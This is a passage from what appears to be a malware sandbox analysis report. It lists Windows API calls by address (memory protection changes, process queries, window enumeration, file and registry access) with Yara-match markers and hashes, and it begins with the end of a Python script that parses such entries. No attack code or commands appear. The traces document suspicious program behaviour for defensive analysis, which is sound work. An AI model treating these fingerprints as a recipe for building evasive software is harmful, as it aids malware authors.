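• GetProcessHeap.KERNEL32(004CA9D6,00000009,?,0043987D,00000001,00000001,00000000,80000301), ref: 004CA149
• RtlAllocateHeap.NTDLL(00890000,00000008,80000301), ref: 004CA15D
• MessageBoxA.USER32(00000000,00692564,error,00000010), ref: 004CA176
• String ID: error
"""

# "• Api.MODULE(args), ref: ADDR"; the argument list is optional because the
# report prints argument-less calls as "• GetVersion.KERNEL32 ref: ...".
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})\s*$")
STRING_RE = re.compile(r"^•\s*String ID:\s*(.*)$")


def parse_entries(text):
    """Return a list of (call_sites, strings) per entry.

    call_sites is a tuple of (api, module, args, ref); strings is the set of
    '$'-separated constants from the entry's String ID line, which closes the entry.
    """
    entries, calls = [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            api, module, args, ref = m.groups()
            argv = tuple(a.strip() for a in args.split(",")) if args is not None else ()
            calls.append((api, module, argv, ref.upper()))
            continue
        m = STRING_RE.match(line)
        if m:
            entries.append((tuple(calls), {s for s in m.group(1).split("$") if s}))
            calls = []
    return entries


def group_by_call_site(entries):
    """Merge entries whose call sites (api, module, args and ref) are identical.

    Returns {call_sites: {"count", "common", "variable"}}: 'common' holds strings
    present in every merged entry, 'variable' those that differ between them.
    Any difference in an argument (including an unresolved '?') keeps entries apart.
    """
    buckets = defaultdict(list)
    for calls, strings in entries:
        buckets[calls].append(strings)
    summary = {}
    for calls, sets in buckets.items():
        common = set.intersection(*sets)
        summary[calls] = {"count": len(sets), "common": common,
                          "variable": set.union(*sets) - common}
    return summary


def http_methods_at(summary, ref):
    """Variable strings of the group whose first call is at 'ref' (empty if none)."""
    for calls, info in summary.items():
        if calls and calls[0][3] == ref.upper():
            return info["variable"]
    return set()


if __name__ == "__main__":
    for calls, info in group_by_call_site(parse_entries(SAMPLE)).items():
        sites = ", ".join(f"{api} @ {ref}" for api, _, _, ref in calls)
        print(f"{info['count']} entries: {sites}")
        print(f"  common strings  : {sorted(info['common'])}")
        print(f"  variable strings: {sorted(info['variable'])}")
```

                                                                 Run with python3; it prints one line per merged call site followed by its common and variable strings. For the sample this yields one location at 00404F24 with the seven method names as the variable set and "User-Agent:" / "https://" as the fixed set, and the heap/MessageBoxA location as a separate single-entry group with "error" as its only constant.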

                                                                 Control-flow Graph (basic block ranges and edges recovered from the graph)
                                                                 • 4ca140-4ca147 -> 4ca149-4ca14f (GetProcessHeap) or 4ca154-4ca167 (RtlAllocateHeap)
                                                                 • 4ca149-4ca14f -> 4ca154-4ca167
                                                                 • 4ca154-4ca167 -> 4ca169-4ca182 (MessageBoxA, call 4ca060) or 4ca185-4ca188
                                                                 • 4ca169-4ca182 -> 4ca185-4ca188
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(004CA9D6,00000009,?,0043987D,00000001,00000001,00000000,80000301), ref: 004CA149
                                                                • RtlAllocateHeap.NTDLL(00890000,00000008,80000301), ref: 004CA15D
                                                                • MessageBoxA.USER32(00000000,00692564,error,00000010), ref: 004CA176
                                                                Similarity
                                                                • API ID: Heap$AllocateMessageProcess
                                                                • String ID: error
                                                                • API String ID: 2992861138-1574812785
                                                                • Opcode ID: 6cc9ae6643fce89fb878b5226d4865382fc2cc6f9f6baca345d6c89dee7f4d46
                                                                • Instruction ID: f9445343b595d22243d3f9e86524e36e45042542ad062984fc3efa72d9019bbb
                                                                • Opcode Fuzzy Hash: 6cc9ae6643fce89fb878b5226d4865382fc2cc6f9f6baca345d6c89dee7f4d46
                                                                • Instruction Fuzzy Hash: 9CE06874A80310BFCB215F24BC49F073B0CAB00B6CF05002DF401E6291EA249C008746

                                                                Control-flow Graph

                                                                APIs
                                                                • GetVersion.KERNEL32 ref: 004DC1A8
                                                                  • Part of subcall function 004DE497: HeapCreate.KERNEL32(00000000,00001000,00000000,004DC1E0,00000001), ref: 004DE4A8
                                                                  • Part of subcall function 004DE497: HeapDestroy.KERNEL32 ref: 004DE4E7
                                                                • GetCommandLineA.KERNEL32 ref: 004DC208
                                                                • GetStartupInfoA.KERNEL32(?), ref: 004DC233
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004DC256
                                                                  • Part of subcall function 004DC2AF: ExitProcess.KERNEL32 ref: 004DC2CC
                                                                Similarity
                                                                • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                • String ID:
                                                                • API String ID: 2057626494-0
                                                                • Opcode ID: 4cb71da1d703da4d57d4ff24e1180fdef8367a5661f3f4791730dcb98eebb689
                                                                • Instruction ID: 4c17e28815541c3b44c9d9b477b68900f1a8c1745b002ad51bf5e9a14c941108
                                                                • Opcode Fuzzy Hash: 4cb71da1d703da4d57d4ff24e1180fdef8367a5661f3f4791730dcb98eebb689
                                                                • Instruction Fuzzy Hash: 3521B4B0C00316AFDB08AFA6DCAAA6E7BA9EF45704F10012FF501AA391DB3C4440D769
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(0000000D,00000000,00000028), ref: 00454FEF
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID: #$.dll
                                                                • API String ID: 1951056069-2261052886
                                                                • Opcode ID: 727c89a4909ef48bb652a2026ef287f70b9121d9278eb1b8f1751e0945d7fb7c
                                                                • Instruction ID: ed3bc6c084c475aeff6df447bd4f7ab37f5c48f4950614627e78160bed86bcc9
                                                                • Opcode Fuzzy Hash: 727c89a4909ef48bb652a2026ef287f70b9121d9278eb1b8f1751e0945d7fb7c
                                                                • Instruction Fuzzy Hash: F03231B1E00608BBEF50DFA5DC85FEDB7B5EF08305F14402AFA04BA292D77559148B59
                                                                APIs
                                                                • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001), ref: 004546D0
                                                                • RegisterClipboardFormatA.USER32(?), ref: 00454A00
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClipboardFormatRegisterVersion
                                                                • String ID: ntdll.dll
                                                                • API String ID: 3667372345-2227199552
                                                                • Opcode ID: 30c7b3fd3498b6156dcd68cbbd17286ce9118d9aa5d5f3890251620b00d164ab
                                                                • Instruction ID: 3932ca4b17ef40bc8a5150b00957b1a093bf0598d7dd5dd04f35d68ed63bf2ea
                                                                • Opcode Fuzzy Hash: 30c7b3fd3498b6156dcd68cbbd17286ce9118d9aa5d5f3890251620b00d164ab
                                                                • Instruction Fuzzy Hash: ADD1B4B1E40306ABEB00DFA4DCC2B5A77B4EB55318F24007AEA05AF382D379AD54CB55
                                                                APIs
                                                                • VirtualProtect.KERNEL32(?,00000000,00000040,00000000), ref: 0040ADCF
                                                                • VirtualProtect.KERNEL32(?,00000000,00000040,?,?,?,00000000,?), ref: 0040AEC0
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: @
                                                                • API String ID: 544645111-2766056989
                                                                • Opcode ID: ce2bc99d04788e5046f016d56dea37d69a29dabca21c849e53ac88aa2ace038b
                                                                • Instruction ID: d2ea49740a1db357f0699095a796fd762f7907ae697645e85e698399e2ce31c4
                                                                • Opcode Fuzzy Hash: ce2bc99d04788e5046f016d56dea37d69a29dabca21c849e53ac88aa2ace038b
                                                                • Instruction Fuzzy Hash: 4161DA75A00319AFDB00DF95D8C1B9EB7B5EF0D301F044066EA04AB352D775AA50DB66
                                                                APIs
                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004CC4F8
                                                                • GetDiskFreeSpaceExA.KERNEL32(?,?,00000000,?), ref: 004CC53F
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentDirectoryDiskFreeSpace
                                                                • String ID: :
                                                                • API String ID: 765553577-336475711
                                                                • Opcode ID: 74441a6f68166480527f9f3647b6d28d3e3473f70e540971c0af312ec44d2bf6
                                                                • Instruction ID: 66ef20862a2fa94411cb16bc2f3f96d3e494f4b1d16703b22b006ed3190c8992
                                                                • Opcode Fuzzy Hash: 74441a6f68166480527f9f3647b6d28d3e3473f70e540971c0af312ec44d2bf6
                                                                • Instruction Fuzzy Hash: F601B93520C3419BD310CA28C881FBBBBD8AFD5754F148A1DF599862D1E674D9098797
                                                                APIs
                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,?), ref: 00450222
                                                                • CloseHandle.KERNEL32(00000000), ref: 00450251
                                                                • RtlMoveMemory.NTDLL(?,00000000,00000018), ref: 00450297
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleInformationMemoryMoveProcessQuery
                                                                • String ID:
                                                                • API String ID: 2688062226-0
                                                                • Opcode ID: fd5e07e8741dab823db216c58e7993cf15373d2a5c05a80ee096a421e9b6a3b7
                                                                • Instruction ID: 25ea611b6c7a4c6032f62225f801977dfb1b85b568b54f4718c0914ad8fd696c
                                                                • Opcode Fuzzy Hash: fd5e07e8741dab823db216c58e7993cf15373d2a5c05a80ee096a421e9b6a3b7
                                                                • Instruction Fuzzy Hash: A041A4B5E40309BBEB40DF94CD86FBEB7B4EB05305F14006AF904B7282D6759E148BA6
                                                                APIs
                                                                • SysAllocString.OLEAUT32(?), ref: 0040483D
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocString
                                                                • String ID: 7@
                                                                • API String ID: 2525500382-48919864
                                                                • Opcode ID: ef44b6758f7e8dd38297ca8c3c93c1b47e841f9f601a407c95b7b187808cd2a1
                                                                • Instruction ID: 7dcf7b1073dd24ab5f2e42db54d6e45d9604daa1de8e0b7f1b4b9891810e5e84
                                                                • Opcode Fuzzy Hash: ef44b6758f7e8dd38297ca8c3c93c1b47e841f9f601a407c95b7b187808cd2a1
                                                                • Instruction Fuzzy Hash: 53F068B6E00348A7DB50EFD5DC42B6EB774AB44700F048475B70476281D779DA50DB59
                                                                APIs
                                                                • PathFileExistsA.SHLWAPI(00483E10,00483E10,00000000,00000000,00000000), ref: 00484300
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: a5H
                                                                • API String ID: 1174141254-1818391313
                                                                • Opcode ID: bc155f9aefd854046854585630a46014a44f563b8be9342980b0d91e57f6e3d3
                                                                • Instruction ID: 2ee381d0ca669a93f7a8ea4db94252d82b737ff645aa1bcbe9151c25ef5a4f6e
                                                                • Opcode Fuzzy Hash: bc155f9aefd854046854585630a46014a44f563b8be9342980b0d91e57f6e3d3
                                                                • Instruction Fuzzy Hash: B7E0C270E05308BBC710BE40E947B6DB734EB0A702F80906ABE043B181E6715A25AB9F
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00463B4B
                                                                • PathFindFileNameA.SHLWAPI(00000000), ref: 00463B7F
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileName$FindModulePath
                                                                • String ID:
                                                                • API String ID: 1618668439-0
                                                                • Opcode ID: 6a2c8ae281a3f2c4be4be1e360b4261b4cc27f2ae0ddfbefae94f93bb2810be7
                                                                • Instruction ID: a98ddf164613351a7ec9681d1082950ca6b03c5219990a82cf34d2ae541c8e9a
                                                                • Opcode Fuzzy Hash: 6a2c8ae281a3f2c4be4be1e360b4261b4cc27f2ae0ddfbefae94f93bb2810be7
                                                                • Instruction Fuzzy Hash: 3531E9B1E00304BBEB10EFB59D46BAE77B8DB04715F14006BB504F7282E6799F409B5A
                                                                APIs
                                                                • GetNativeSystemInfo.KERNEL32(00000000,?,?,?,?,?,?,0043FBBC), ref: 0043FFBA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoNativeSystem
                                                                • String ID:
                                                                • API String ID: 1721193555-0
                                                                • Opcode ID: 2a0d229e355e55547aab068ee7e8295074c8c2809864fa630c9c9fdff783c5f6
                                                                • Instruction ID: 693db7e8361b57ba436b50b348fba0e3e211ed968e5a0034c296085f5fc21831
                                                                • Opcode Fuzzy Hash: 2a0d229e355e55547aab068ee7e8295074c8c2809864fa630c9c9fdff783c5f6
                                                                • Instruction Fuzzy Hash: AB41F7B1A812479BEB00CF98DCC0A44B7F1FF69324B2914B1D446AF344E378B861DB26
                                                                APIs
                                                                • EnumWindows.USER32(0045604F,00000000), ref: 00455F3B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumWindows
                                                                • String ID:
                                                                • API String ID: 1129996299-0
                                                                • Opcode ID: 3c64ab9b2b6f7a27724245be5d05ab14e704189e44b6ea2adeb03fbc447a949f
                                                                • Instruction ID: 4ce8361ed78493a74a4e7177a5c01308a6dace2113c92b98fa79349a07303b30
                                                                • Opcode Fuzzy Hash: 3c64ab9b2b6f7a27724245be5d05ab14e704189e44b6ea2adeb03fbc447a949f
                                                                • Instruction Fuzzy Hash: EB1142B1A00304ABDB50EF74D8C6F6937A8970E315F10142AFA049B296E6799910875A
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 0047F58B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: ac94dc257f330638ff14f06f1fa4adeeb0ac26ff8cc901f61283060125f05197
                                                                • Instruction ID: ea3f5665932ad2f34edc6bf6aab39897a6a72eac6c178b2f00f6e5fe460a50d9
                                                                • Opcode Fuzzy Hash: ac94dc257f330638ff14f06f1fa4adeeb0ac26ff8cc901f61283060125f05197
                                                                • Instruction Fuzzy Hash: CFF09671E04309FFDB50EF54DC86BAD7778A705310F10807BF90966282E6798A58DBAA
                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0047E3AD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateHeap
                                                                • String ID:
                                                                • API String ID: 10892065-0
                                                                • Opcode ID: a73b99def3baad678315cb304b22f8869d820025e78d4553ff8336d64bc3ad00
                                                                • Instruction ID: 9a6b6a4a6dfa21085f4df1b5df88413363788b82f2df2ff077b2f5c73c787e8f
                                                                • Opcode Fuzzy Hash: a73b99def3baad678315cb304b22f8869d820025e78d4553ff8336d64bc3ad00
                                                                • Instruction Fuzzy Hash: EEE08630E48308B7E620AF61AC47F6DBA24A70A716F1051EBF9083F1C1D5B99914978F
                                                                APIs
                                                                • EnumWindows.USER32(00456281,?), ref: 00456180
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumWindows
                                                                • String ID:
                                                                • API String ID: 1129996299-0
                                                                • Opcode ID: dd25d8598ca831e392d38ba66c57df5ea3b948611412c1715744fbdd9a553bd7
                                                                • Instruction ID: 2005816b88822f529ba9eaaabc534035d0a4891a04e2f16536e821f439f5f1d9
                                                                • Opcode Fuzzy Hash: dd25d8598ca831e392d38ba66c57df5ea3b948611412c1715744fbdd9a553bd7
                                                                • Instruction Fuzzy Hash: 33E08671D44208B7D710EE80DD07F79F7389702701F505166FE086B182E6759A24DBDE

                                                                 Control-flow Graph
                                                                 • Basic blocks: 429df0-429df7; 429df9-429dff (GetProcessHeap); 429e04-429e17 (RtlAllocateHeap); 429e19-429e32 (MessageBoxA, call 429d10); 429e35-429e38
                                                                 • Edges: 429df0 -> 429df9 or 429e04; 429df9 -> 429e04; 429e04 -> 429e19 or 429e35; 429e19 -> 429e35
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(0042B906,00000009,?,0041C3C1,00000001,00000001,00000000,80000301), ref: 00429DF9
                                                                • RtlAllocateHeap.NTDLL(00890000,00000008,80000301), ref: 00429E0D
                                                                • MessageBoxA.USER32(00000000,004F8560,error,00000010), ref: 00429E26
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateMessageProcess
                                                                • String ID: error
                                                                • API String ID: 2992861138-1574812785
                                                                • Opcode ID: 42789f49d26c4287f4e36636d29d109596c8bb179141dc87d156da08d3016c35
                                                                • Instruction ID: bf3efa087c8b5cb8982251e3b842f4d786e4710e511cb19dd94e4f33563dcc3d
                                                                • Opcode Fuzzy Hash: 42789f49d26c4287f4e36636d29d109596c8bb179141dc87d156da08d3016c35
                                                                • Instruction Fuzzy Hash: F7E0D871B443217BDB11AB70BC09F173658AB18751F000129F505EA381FA74AC008BAC

                                                                 Control-flow Graph
                                                                 • Basic blocks: 429e40-429e47; 429e49-429e4f (GetProcessHeap); 429e54-429e67 (RtlAllocateHeap); 429e69-429e82 (MessageBoxA, call 429d10); 429e85-429e88
                                                                 • Edges: 429e40 -> 429e49 or 429e54; 429e49 -> 429e54; 429e54 -> 429e69 or 429e85; 429e69 -> 429e85
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00430F07,0042B5A1,00000000,00000000,0042B599,00000000,?,?,?,?,004EE32A), ref: 00429E49
                                                                • RtlAllocateHeap.NTDLL(00890000,00000000,?), ref: 00429E5D
                                                                • MessageBoxA.USER32(00000000,004F8560,error,00000010), ref: 00429E76
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateMessageProcess
                                                                • String ID: error
                                                                • API String ID: 2992861138-1574812785
                                                                • Opcode ID: a737859c86d6c8ac7b9036cebb3af0e9a0c446b071879652699e0c5efdca9e3b
                                                                • Instruction ID: 1d090cf3d50d77caf2b684a4305285ba98a51fa6eaab9df56633b372218b35bf
                                                                • Opcode Fuzzy Hash: a737859c86d6c8ac7b9036cebb3af0e9a0c446b071879652699e0c5efdca9e3b
                                                                • Instruction Fuzzy Hash: 4EE0D871B443217BDB11AB70BC09F573658AB08B50F100129F505EA391EA74AC008B6C
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000,80000005), ref: 004CB6D8
                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0000026C,?,00000000,80000005), ref: 004CB717
                                                                • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000000,80000005), ref: 004CB72A
                                                                • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000000,80000005), ref: 004CB745
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateWrite
                                                                • String ID:
                                                                • API String ID: 3602564925-0
                                                                • Opcode ID: 5e44c00bc9f6af056ee6d8b1fae6ecb27c52028f03262c11e00e7cef39d2d576
                                                                • Instruction ID: 9b92ee7843717eecef0deef7be85b124004baf2fd79b32a398e9cbdf37809ffd
                                                                • Opcode Fuzzy Hash: 5e44c00bc9f6af056ee6d8b1fae6ecb27c52028f03262c11e00e7cef39d2d576
                                                                • Instruction Fuzzy Hash: C8115E35204341AFD710DF18ECC6F6AB7E4FB84724F15492AFD5497281D374A8098B65
                                                                APIs
                                                                • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000020,00000000,00000000,0040A66A,00000001,00000000,00000000,80000004), ref: 0042C265
                                                                • GetFileSize.KERNEL32(00000000,?,004EE32A,00000268), ref: 0042C27C
                                                                  • Part of subcall function 00429E40: GetProcessHeap.KERNEL32(00430F07,0042B5A1,00000000,00000000,0042B599,00000000,?,?,?,?,004EE32A), ref: 00429E49
                                                                  • Part of subcall function 00429E40: RtlAllocateHeap.NTDLL(00890000,00000000,?), ref: 00429E5D
                                                                  • Part of subcall function 00429E40: MessageBoxA.USER32(00000000,004F8560,error,00000010), ref: 00429E76
                                                                • ReadFile.KERNEL32(00000000,00000008,00000000,?,00000000), ref: 0042C2A8
                                                                • CloseHandle.KERNEL32(00000000), ref: 0042C2AF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Heap$AllocateCloseCreateHandleMessageProcessReadSize
                                                                • String ID:
                                                                • API String ID: 749537981-0
                                                                • Opcode ID: 4f7bb720d2e01f8983ae0954a15bef8dc3cd7fd3d81463fb6a7b77a6ca83b96d
                                                                • Instruction ID: b0f5b7e34a998acfc825b17d2971736302182a16368fbd127285adb01735bf30
                                                                • Opcode Fuzzy Hash: 4f7bb720d2e01f8983ae0954a15bef8dc3cd7fd3d81463fb6a7b77a6ca83b96d
                                                                • Instruction Fuzzy Hash: 06F04476204340BBE3219B64ECC9F9B76ACEB84B24F104A2DF7169A1D1E674A904C765
                                                                APIs
                                                                • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 004CEC29
                                                                • RegQueryValueExA.ADVAPI32 ref: 004CEC52
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004CEC70
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 3764a443deadd06c4a0d82dedec28b419bbbc1afda03b0f2d4d3c80ed3f27859
                                                                • Instruction ID: 4cf950411e1953979288e3df13bf5bb7bab8559ec715c5f8ddde97f22ba18a99
                                                                • Opcode Fuzzy Hash: 3764a443deadd06c4a0d82dedec28b419bbbc1afda03b0f2d4d3c80ed3f27859
                                                                • Instruction Fuzzy Hash: E42105752042455BE328DA25AC45FBB76C8FBC0724F084A2EFE4587281DB79DD0983A9
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00401009), ref: 00429C90
                                                                • CoInitialize.OLE32(00000000), ref: 00429C9D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: HeapInitializeProcess
                                                                • String ID: `B
                                                                • API String ID: 1740904833-3602356314
                                                                • Opcode ID: d13fbe667554f4f222c042abc57d3d67203191cce2fc9df8ff623d9356d53f74
                                                                • Instruction ID: 3521e008686e00f503bfc0c44891b9bca2654c31a954ef26948e6775ba85c4bf
                                                                • Opcode Fuzzy Hash: d13fbe667554f4f222c042abc57d3d67203191cce2fc9df8ff623d9356d53f74
                                                                • Instruction Fuzzy Hash: 4BE086317042709FD3148F69FE44B563794A704750F044035EA0ACF2A3D6A9AC008B5A
                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,004DC1E0,00000001), ref: 004DE4A8
                                                                  • Part of subcall function 004DE34F: GetVersionExA.KERNEL32 ref: 004DE36E
                                                                • HeapDestroy.KERNEL32 ref: 004DE4E7
                                                                  • Part of subcall function 004DF49E: RtlAllocateHeap.NTDLL(00000000,00000140,004DE4D0), ref: 004DF4AB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
